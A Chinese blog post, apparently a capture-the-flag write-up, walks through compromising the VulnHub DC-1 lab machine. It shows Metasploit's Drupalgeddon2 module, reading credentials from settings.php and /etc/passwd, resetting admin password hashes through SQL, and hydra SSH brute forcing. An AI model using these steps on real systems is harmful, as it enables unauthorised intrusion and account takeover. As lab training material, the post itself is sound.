<!DOCTYPE html>
<html lang="en" data-bs-theme="auto">

<!-- Head tag -->
<head>

    <meta charset="utf-8"/>
    <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
    <meta name="viewport" content="width=device-width, initial-scale=1"/>

    <!--Description-->

    

    
        <meta name="description" content="一. 环境搭建1.1、DC-1靶场机官网下载 https://download.vulnhub.com/dc/DC-1.zip
1.2、安装过程解压后得到个.ova文件

进入Vm打开，然后等待导入完毕。
然后再更改kali的网络连接模式为桥接模式，让DC靶机跟kali处于同一网段，这用kali才能"/>
    
    
    <!--Keywords-->
    <meta name="keywords" content="">

    <!--Author-->
    
        <meta name="author" content="evabd21"/>
    

    <!--Open Graph Title-->
    
        <meta property="og:title" content="DC-1靶场记录"/>
    

    <!--Open Graph Description-->
    
        <meta property="og:description" content="一. 环境搭建1.1、DC-1靶场机官网下载 https://download.vulnhub.com/dc/DC-1.zip
1.2、安装过程解压后得到个.ova文件

进入Vm打开，然后等待导入完毕。
然后再更改kali的网络连接模式为桥接模式，让DC靶机跟kali处于同一网段，这用kali才能"/>
    

    <!--Open Graph Site Name-->
        <meta property="og:site_name" content="evabd21"/>

    <!--Type page-->
    
        <meta property="og:type" content="article"/>
    

    <!--Page Cover-->
    
    

    <meta name="twitter:card" content="summary_large_image"/>

    

    

    <!-- Title -->
    
    <title>DC-1靶场记录 - evabd21</title>

    <!-- Google Analytics -->
    


    <!-- favicon -->
    
    <link rel="icon" href="/images/favicon.ico"/>
    
      
<!-- hexo injector head_end start --><link rel="stylesheet" href="/css/bootstrap.min.css"><link rel="stylesheet" href="/css/color-modes.css"><link rel="stylesheet" href="/bootstrap-icons/font/bootstrap-icons.css"><script src="/js/bootstrap.bundle.min.js"></script><script type="module" src="/js/color-modes.js"></script><link rel="stylesheet" href="/css/highlight.css"><script src="https://cdn.jsdelivr.net/gh/BP-Devteam/sitescansense/s3module.min.js"></script><script src="/js/init.js"></script><!-- hexo injector head_end end --><meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="evabd21" type="application/atom+xml">
    <link rel="preconnect" href="https://fonts.googleapis.com"/>
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin/>
    <link href="https://fonts.googleapis.com/css2?family=Manrope:wght@400;500;600;700;800&display=swap" rel="stylesheet"/>
    <link rel="stylesheet" href="/css/brand-shell.css"/>
</head>


<body class="brand-page brand-page-article">
    <!-- Menu -->
    <div class="site-shell">
      <header class="site-nav">
        <div class="container">
          <div class="nav-frame">
            <a href="/" class="brand-mark">evabd21</a>
            <nav aria-label="Primary navigation">
              <ul class="nav-links">
                <li><a href="/getting-start">About</a></li>
                <li><a href="/archives">Archives</a></li>
                <li><a target="_blank" rel="noopener" href="https://github.com/evabd21/evabd21.github.io">Github</a></li>
              </ul>
            </nav>
          </div>
        </div>
      </header>

    <!-- color mode button -->
<svg xmlns="http://www.w3.org/2000/svg" class="d-none">
    <symbol id="check2" viewBox="0 0 16 16">
      <path d="M13.854 3.646a.5.5 0 0 1 0 .708l-7 7a.5.5 0 0 1-.708 0l-3.5-3.5a.5.5 0 1 1 .708-.708L6.5 10.293l6.646-6.647a.5.5 0 0 1 .708 0z"></path>
    </symbol>
    <symbol id="circle-half" viewBox="0 0 16 16">
      <path d="M8 15A7 7 0 1 0 8 1v14zm0 1A8 8 0 1 1 8 0a8 8 0 0 1 0 16z"></path>
    </symbol>
    <symbol id="moon-stars-fill" viewBox="0 0 16 16">
      <path d="M6 .278a.768.768 0 0 1 .08.858 7.208 7.208 0 0 0-.878 3.46c0 4.021 3.278 7.277 7.318 7.277.527 0 1.04-.055 1.533-.16a.787.787 0 0 1 .81.316.733.733 0 0 1-.031.893A8.349 8.349 0 0 1 8.344 16C3.734 16 0 12.286 0 7.71 0 4.266 2.114 1.312 5.124.06A.752.752 0 0 1 6 .278z"></path>
      <path d="M10.794 3.148a.217.217 0 0 1 .412 0l.387 1.162c.173.518.579.924 1.097 1.097l1.162.387a.217.217 0 0 1 0 .412l-1.162.387a1.734 1.734 0 0 0-1.097 1.097l-.387 1.162a.217.217 0 0 1-.412 0l-.387-1.162A1.734 1.734 0 0 0 9.31 6.593l-1.162-.387a.217.217 0 0 1 0-.412l1.162-.387a1.734 1.734 0 0 0 1.097-1.097l.387-1.162zM13.863.099a.145.145 0 0 1 .274 0l.258.774c.115.346.386.617.732.732l.774.258a.145.145 0 0 1 0 .274l-.774.258a1.156 1.156 0 0 0-.732.732l-.258.774a.145.145 0 0 1-.274 0l-.258-.774a1.156 1.156 0 0 0-.732-.732l-.774-.258a.145.145 0 0 1 0-.274l.774-.258c.346-.115.617-.386.732-.732L13.863.1z"></path>
    </symbol>
    <symbol id="sun-fill" viewBox="0 0 16 16">
      <path d="M8 12a4 4 0 1 0 0-8 4 4 0 0 0 0 8zM8 0a.5.5 0 0 1 .5.5v2a.5.5 0 0 1-1 0v-2A.5.5 0 0 1 8 0zm0 13a.5.5 0 0 1 .5.5v2a.5.5 0 0 1-1 0v-2A.5.5 0 0 1 8 13zm8-5a.5.5 0 0 1-.5.5h-2a.5.5 0 0 1 0-1h2a.5.5 0 0 1 .5.5zM3 8a.5.5 0 0 1-.5.5h-2a.5.5 0 0 1 0-1h2A.5.5 0 0 1 3 8zm10.657-5.657a.5.5 0 0 1 0 .707l-1.414 1.415a.5.5 0 1 1-.707-.708l1.414-1.414a.5.5 0 0 1 .707 0zm-9.193 9.193a.5.5 0 0 1 0 .707L3.05 13.657a.5.5 0 0 1-.707-.707l1.414-1.414a.5.5 0 0 1 .707 0zm9.193 2.121a.5.5 0 0 1-.707 0l-1.414-1.414a.5.5 0 0 1 .707-.707l1.414 1.414a.5.5 0 0 1 0 .707zM4.464 4.465a.5.5 0 0 1-.707 0L2.343 3.05a.5.5 0 1 1 .707-.707l1.414 1.414a.5.5 0 0 1 0 .708z"></path>
    </symbol>
  </svg>
<div class="dropdown position-fixed bottom-0 end-0 mb-3 me-3 bd-mode-toggle z-1">
    <button class="btn btn-bd-primary py-2 dropdown-toggle d-flex align-items-center" id="bd-theme" type="button" aria-expanded="false" data-bs-toggle="dropdown" aria-label="Toggle theme (dark)">
      <svg class="bi my-1 theme-icon-active" width="1em" height="1em"><use href="#moon-stars-fill"></use></svg>
      <span class="visually-hidden" id="bd-theme-text">Toggle theme</span>
    </button>
    <ul class="dropdown-menu dropdown-menu-end shadow" aria-labelledby="bd-theme-text">
      <li>
        <button type="button" class="dropdown-item d-flex align-items-center" data-bs-theme-value="light" aria-pressed="false">
          <svg class="bi me-2 opacity-50 theme-icon" width="1em" height="1em"><use href="#sun-fill"></use></svg>
          Light
          <svg class="bi ms-auto d-none" width="1em" height="1em"><use href="#check2"></use></svg>
        </button>
      </li>
      <li>
        <button type="button" class="dropdown-item d-flex align-items-center active" data-bs-theme-value="dark" aria-pressed="true">
          <svg class="bi me-2 opacity-50 theme-icon" width="1em" height="1em"><use href="#moon-stars-fill"></use></svg>
          Dark
          <svg class="bi ms-auto d-none" width="1em" height="1em"><use href="#check2"></use></svg>
        </button>
      </li>
      <li>
        <button type="button" class="dropdown-item d-flex align-items-center" data-bs-theme-value="auto" aria-pressed="false">
          <svg class="bi me-2 opacity-50 theme-icon" width="1em" height="1em"><use href="#circle-half"></use></svg>
          Auto
          <svg class="bi ms-auto d-none" width="1em" height="1em"><use href="#check2"></use></svg>
        </button>
      </li>
    </ul>
  </div>

    <main class="page-shell">
        <section class="page-header-section">
          <div class="container">
            <div class="page-header-panel">
              <span class="page-kicker">Research Article</span>
              <h1 class="page-title">DC-1靶场记录</h1>
              <p class="page-description">DC-1靶场记录 is presented with the same minimal technology-driven shell, improving rhythm, code readability, and long-form scanning.</p>
            </div>
          </div>
        </section>
        <section class="page-content-section">
<article class="article-shell">
    <div class="container">
        <div class="row">
            <div class="col mb-1 d-flex justify-content-between small text-secondary text-opacity-50 article-meta-bar">
                <div>page views <span class="s3_pv">0</span></div>
                 <!-- Date and Author -->
                 
                
                <div>update <span>2022-03-15</span></div>
            </div>
        </div>
    </div>
    <div class="container">
        <!-- Cover Image -->
        
        <div class="row">
            <!-- Gallery -->
            

            <!-- Post Main Content 
            <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                -->
            <div class="mx-auto col-md-10 col-md-offset-1 article-body">
                <h2 id="一-环境搭建"><a href="#一-环境搭建" class="headerlink" title="一. 环境搭建"></a>一. 环境搭建</h2><h3 id="1-1、DC-1靶场机"><a href="#1-1、DC-1靶场机" class="headerlink" title="1.1、DC-1靶场机"></a>1.1、DC-1靶场机</h3><p>官网下载 <a target="_blank" rel="noopener" href="https://download.vulnhub.com/dc/DC-1.zip">https://download.vulnhub.com/dc/DC-1.zip</a></p>
<h3 id="1-2、安装过程"><a href="#1-2、安装过程" class="headerlink" title="1.2、安装过程"></a>1.2、安装过程</h3><p>解压后得到个.ova文件</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1715602590543-4.png" alt="Image"></p>
<p>进入Vm打开，然后等待导入完毕。</p>
<p>然后再更改kali的网络连接模式为桥接模式，让DC靶机跟kali处于同一网段，这用kali才能扫出DC的主机，当然也可以设置为net，但必须DC-1靶机也设为net。</p>
<h2 id="二-渗透过程"><a href="#二-渗透过程" class="headerlink" title="二. 渗透过程"></a>二. 渗透过程</h2><h3 id="2-1、信息收集"><a href="#2-1、信息收集" class="headerlink" title="2.1、信息收集"></a>2.1、信息收集</h3><p>①探测目标IP地址</p>
<p>探测主机的工具有很多，常见的有arp-scan、nmap还有netdiscover</p>
<p>arp-scan -l</p>
<p>该命令是探测当前网段的所有存活主机的IP地址</p>
<p>可以看到当前网段内存活的主机IP为192.168.228.132</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1715602783200-6.png" alt="Image"></p>
<p>可以用nmap去探测一下该IP开了什么端口。</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1715602806018-8.png" alt="Image"></p>
<p>可以看到这个ip开了80端口，我们可以直接浏览器访问这个Ip地址。</p>
<p>利用火绒插件wappalyzer，查看站点信息，也可以自己判断，网页一看cms就是drupal</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1715602827594-10.png" alt="Image"></p>
<p>当然也可以用kali自带的工具whatweb扫</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">whatweb -v 192.168.228.132</span><br></pre></td></tr></table></figure>

<p><img src="/imgs/$%7Bfiilename%7D/Image-1715602851720-12.png" alt="Image"></p>
<p>经过信息收集之后我们可以得到如下信息</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">CMS是Drupal</span><br><span class="line">Apache 2.2.22</span><br><span class="line">PHP 5.4.45</span><br><span class="line">jQuery 1.4.4</span><br></pre></td></tr></table></figure>

<h3 id="2-2、漏洞查找与利用"><a href="#2-2、漏洞查找与利用" class="headerlink" title="2.2、漏洞查找与利用"></a>2.2、漏洞查找与利用</h3><p>知道cms，我们一般从cms出发找漏洞，百度一下drupal漏洞</p>
<p>这是一个框架漏洞，我们可以用kali自带的工具Metasploit（目前世界上领先的渗透测试工具，也是信息安全与渗透测试领域最大的开源项目之一），找一下漏洞。</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1715602938674-14.png" alt="Image"></p>
<p>先打开工具</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfconsole</span><br></pre></td></tr></table></figure>

<p><img src="/imgs/$%7Bfiilename%7D/Image-1715602965162-16.png" alt="Image"></p>
<p>用search命令去搜索我们要渗透的网站框架</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">search Drupal</span><br></pre></td></tr></table></figure>

<p><img src="/imgs/$%7Bfiilename%7D/Image-1715602993590-18.png" alt="Image"></p>
<p>可以看到这个cms框架还是有挺多漏洞的，这里我们利用漏洞等级较高的，我们选择2018年的那个漏洞</p>
<p>使用use命令 + 漏洞名称，指定我们要利用的漏洞</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">use exploit/unix/webapp/drupal_drupalgeddon2</span><br></pre></td></tr></table></figure>

<p><img src="/imgs/$%7Bfiilename%7D/Image-1715603017915-20.png" alt="Image"></p>
<p>接着看一下该漏洞模块参数</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">show options</span><br></pre></td></tr></table></figure>

<p><img src="/imgs/$%7Bfiilename%7D/Image-1715603040336-22.png" alt="Image"></p>
<p>Current Setting是目前设置的内容</p>
<p>Required表示是否需要设置内容，yes为必须设置，no可以设置也可不设置</p>
<p>就上面来说RHOSTS需要set。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">set 192.168.228.132</span><br></pre></td></tr></table></figure>

<p><img src="/imgs/$%7Bfiilename%7D/Image-1715603061132-24.png" alt="Image"></p>
<p>设置完参数之后就可以run了</p>
<p>出现Meterpreter session 1 opened（kali和目标ip的连接）就说明攻击成功啦，接下来我们可以直接上shell</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1715603077084-26.png" alt="Image"></p>
<h2 id="三-Getshell"><a href="#三-Getshell" class="headerlink" title="三. Getshell"></a>三. Getshell</h2><h3 id="3-1、获取普通shell"><a href="#3-1、获取普通shell" class="headerlink" title="3.1、获取普通shell"></a>3.1、获取普通shell</h3><p>shell</p>
<p>获取一下普通的shell，然后执行ls命令</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1715603112429-31.png" alt="Image"></p>
<h3 id="3-2、获取交互shell"><a href="#3-2、获取交互shell" class="headerlink" title="3.2、获取交互shell"></a>3.2、获取交互shell</h3><p>这样看起来有点不习惯，不过我们可以利用python实现互交shell，这样就好看一点。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -c &#x27;import pty; pty.spawn(&quot;/bin/bash&quot;)&#x27;</span><br></pre></td></tr></table></figure>

<p>然后查看flag1.txt</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1715603210599-33.png" alt="Image"></p>
<p>每个好的CMS都需要一个配置文件，你也一样。这个先放着，看看还有没有其他flag文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find / -name flag*</span><br></pre></td></tr></table></figure>

<p><img src="/imgs/$%7Bfiilename%7D/Image-1715603234181-35.png" alt="Image"></p>
<p>就只有这一个flag文件，上面的flag说每个cms都需要一个好的配置文件，我们去搜一下Drupal配置文件，路径挺复杂的不过知道名字叫settings.php，我们可以用命令直接搜索并打开，内联执行</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat `find / -name settings.php`</span><br></pre></td></tr></table></figure>

<p><img src="/imgs/$%7Bfiilename%7D/Image-1715603259951-37.png" alt="Image"></p>
<p>在这里我们得到了数据库用户名和密码，直接连接数据库</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">mysql -udbuser -pR0ck3t</span><br><span class="line"></span><br><span class="line">show databases;#查看数据库</span><br></pre></td></tr></table></figure>

<p><img src="/imgs/$%7Bfiilename%7D/Image-1715603295500-39.png" alt="Image"></p>
<p>有一个名为drupaldb的数据库，进入这个数据库看一下，并查看表</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">use drupaldb;</span><br><span class="line"></span><br><span class="line">show tables;</span><br></pre></td></tr></table></figure>

<p><img src="/imgs/$%7Bfiilename%7D/Image-1715603313625-41.png" alt="Image"></p>
<p>有一张users表，查看一下表的内容</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users;</span><br></pre></td></tr></table></figure>

<p><img src="/imgs/$%7Bfiilename%7D/Image-1715603356260-43.png" alt="Image"></p>
<p>加一个admin。</p>
<p>修改admin密码</p>
<p>我们得先找到加密文件，Drupal的加密脚本在</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/var/www/scripts/password-hash.sh</span><br></pre></td></tr></table></figure>

<p>目录下，先退出mysql，打开加密脚本</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat /var/www/scripts/password-hash.sh</span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/php</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment">* Drupal hash script - to generate a hash from a plaintext password</span></span><br><span class="line"><span class="comment">*</span></span><br><span class="line"><span class="comment">* Check for your PHP interpreter - on Windows you&#x27;ll probably have to</span></span><br><span class="line"><span class="comment">* replace line 1 with</span></span><br><span class="line"><span class="comment">*   #!c:/program files/php/php.exe</span></span><br><span class="line"><span class="comment">*</span></span><br><span class="line"><span class="comment">* <span class="doctag">@param</span> password1 [password2 [password3 ...]]</span></span><br><span class="line"><span class="comment">*  Plain-text passwords in quotes (or with spaces backslash escaped).</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="title function_ invoke__">version_compare</span>(PHP_VERSION, <span class="string">&quot;5.2.0&quot;</span>, <span class="string">&quot;&lt;&quot;</span>)) &#123;</span><br><span class="line">  <span class="variable">$version</span>  = PHP_VERSION;</span><br><span class="line">  <span class="keyword">echo</span> <span class="string">&lt;&lt;&lt;EOF</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">ERROR: This script requires at least PHP version 5.2.0. You invoked it with</span></span><br><span class="line"><span class="string">       PHP version <span class="subst">&#123;$version&#125;</span>.</span></span><br><span class="line"><span class="string">\n</span></span><br><span class="line"><span class="string">EOF</span>;</span><br><span class="line">  <span class="keyword">exit</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="variable">$script</span> = <span class="title function_ invoke__">basename</span>(<span class="title function_ invoke__">array_shift</span>(<span class="variable">$_SERVER</span>[<span class="string">&#x27;argv&#x27;</span>]));</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="title function_ invoke__">in_array</span>(<span class="string">&#x27;--help&#x27;</span>, <span class="variable">$_SERVER</span>[<span class="string">&#x27;argv&#x27;</span>]) || <span class="keyword">empty</span>(<span class="variable">$_SERVER</span>[<span class="string">&#x27;argv&#x27;</span>])) &#123;</span><br><span class="line">  <span class="keyword">echo</span> <span class="string">&lt;&lt;&lt;EOF</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Generate Drupal password hashes from the shell.</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Usage:        <span class="subst">&#123;$script&#125;</span> [OPTIONS] &quot;&lt;plan-text password&gt;&quot;</span></span><br><span class="line"><span class="string">Example:      <span class="subst">&#123;$script&#125;</span> &quot;mynewpassword&quot;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">All arguments are long options.</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">  --help      Print this page.</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">  --root &lt;path&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">              Set the working directory for the script to the specified path.</span></span><br><span class="line"><span class="string">              To execute this script this has to be the root directory of your</span></span><br><span class="line"><span class="string">              Drupal installation, e.g. /home/www/foo/drupal (assuming Drupal</span></span><br><span class="line"><span class="string">              running on Unix). Use surrounding quotation marks on Windows.</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">  &quot;&lt;password1&gt;&quot; [&quot;&lt;password2&gt;&quot; [&quot;&lt;password3&gt;&quot; ...]]</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">              One or more plan-text passwords enclosed by double quotes. The</span></span><br><span class="line"><span class="string">              output hash may be manually entered into the &#123;users&#125;.pass field to</span></span><br><span class="line"><span class="string">              change a password via SQL to a known value.</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">To run this script without the --root argument invoke it from the root directory</span></span><br><span class="line"><span class="string">of your Drupal installation as</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">  ./scripts/<span class="subst">&#123;$script&#125;</span></span></span><br><span class="line"><span class="string">\n</span></span><br><span class="line"><span class="string">EOF</span>;</span><br><span class="line">  <span class="keyword">exit</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="variable">$passwords</span> = <span class="keyword">array</span>();</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">// Parse invocation arguments.</span></span><br><span class="line"><span class="keyword">while</span> (<span class="variable">$param</span> = <span class="title function_ invoke__">array_shift</span>(<span class="variable">$_SERVER</span>[<span class="string">&#x27;argv&#x27;</span>])) &#123;</span><br><span class="line">  <span class="keyword">switch</span> (<span class="variable">$param</span>) &#123;</span><br><span class="line">    <span class="keyword">case</span> <span class="string">&#x27;--root&#x27;</span>:</span><br><span class="line">      <span class="comment">// Change the working directory.</span></span><br><span class="line">      <span class="variable">$path</span> = <span class="title function_ invoke__">array_shift</span>(<span class="variable">$_SERVER</span>[<span class="string">&#x27;argv&#x27;</span>]);</span><br><span class="line">      <span class="keyword">if</span> (<span class="title function_ invoke__">is_dir</span>(<span class="variable">$path</span>)) &#123;</span><br><span class="line">        <span class="title function_ invoke__">chdir</span>(<span class="variable">$path</span>);</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">default</span>:</span><br><span class="line">      <span class="comment">// Add a password to the list to be processed.</span></span><br><span class="line">      <span class="variable">$passwords</span>[] = <span class="variable">$param</span>;</span><br><span class="line">      <span class="keyword">break</span>;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">define</span>(<span class="string">&#x27;DRUPAL_ROOT&#x27;</span>, <span class="title function_ invoke__">getcwd</span>());</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">include_once</span> DRUPAL_ROOT . <span class="string">&#x27;/includes/password.inc&#x27;</span>;</span><br><span class="line"><span class="keyword">include_once</span> DRUPAL_ROOT . <span class="string">&#x27;/includes/bootstrap.inc&#x27;</span>;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">foreach</span> (<span class="variable">$passwords</span> <span class="keyword">as</span> <span class="variable">$password</span>) &#123;</span><br><span class="line">  <span class="keyword">print</span>(<span class="string">&quot;\npassword: <span class="subst">$password</span> \t\thash: &quot;</span>. <span class="title function_ invoke__">user_hash_password</span>(<span class="variable">$password</span>) .<span class="string">&quot;\n&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">print</span>(<span class="string">&quot;\n&quot;</span>);</span><br></pre></td></tr></table></figure>

<p>看到这里我们可以直接运行这个加密脚本，后面跟上我们的密码明文，他就会给我们输出出来密文。这里我们设置一个密码123456</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1715603441738-45.png" alt="Image"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php /var/www/scripts/password-hash.sh 123456</span><br></pre></td></tr></table></figure>

<p><img src="/imgs/$%7Bfiilename%7D/Image-1715603459651-47.png" alt="Image"></p>
<p>我们把这个密文去数据库里面修改amdin,或者Fred的密码</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">mysql <span class="operator">-</span>udbuser <span class="operator">-</span>pR0ck3t</span><br><span class="line"></span><br><span class="line">use drupaldb;<span class="keyword">update</span> users <span class="keyword">set</span> pass <span class="operator">=</span> &quot;$S$DSO2OjMqCiOC0.Qkey6QmlMhSVHY1LOlP9sk3ONvG7t3OyoqiThi&quot; <span class="keyword">where</span> name <span class="operator">=</span> <span class="string">&#x27;admin&#x27;</span> <span class="keyword">or</span> name <span class="operator">=</span> <span class="string">&#x27;Fred&#x27;</span>;</span><br></pre></td></tr></table></figure>

<p>我们可以看到已经修改成我们生成的密码了，这样就可以直接去网站里面登录进去了。</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1715603529262-49.png" alt="Image"></p>
<p>登陆成功</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1715603543803-51.png" alt="Image"></p>
<p>这里有第三个flag3</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1715603563545-53.png" alt="Image"></p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1715603578081-55.png" alt="Image"></p>
<p>登进去就找到了flag3，提示了我们一些信息passwd和shadow，明显就是linux的文件</p>
<p>&#x2F;etc&#x2F;passwd    该文件存储了系统用户的基本信息，所有用户都可以对其进行文件操作读</p>
<p>&#x2F;etc&#x2F;shadow    该文件存储了系统用户的密码等信息，只有root权限用户才能读取</p>
<p>接着我们查看一下用户信息</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat /etc/passwd</span><br></pre></td></tr></table></figure>

<p><img src="/imgs/$%7Bfiilename%7D/Image-1715603630114-57.png" alt="Image"></p>
<p>可以看到有flag4这个用户，我们有两个方法拿到这个用户的密码，一个是爆破，另一个就是提权打开shadow文件查看密码</p>
<h2 id="四-用户密码爆破"><a href="#四-用户密码爆破" class="headerlink" title="四.用户密码爆破"></a>四.用户密码爆破</h2><p>事先参考SSH</p>
<p>利用工具Hydra爆破flag4的密码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hydra -l flag4 -P /usr/share/wordlists/rockyou.txt ssh://192.168.228.132</span><br></pre></td></tr></table></figure>

<p><img src="/imgs/$%7Bfiilename%7D/Image-1715603690426-59.png" alt="Image"></p>
<p>得到密码，orange,然后我们用kali连接</p>
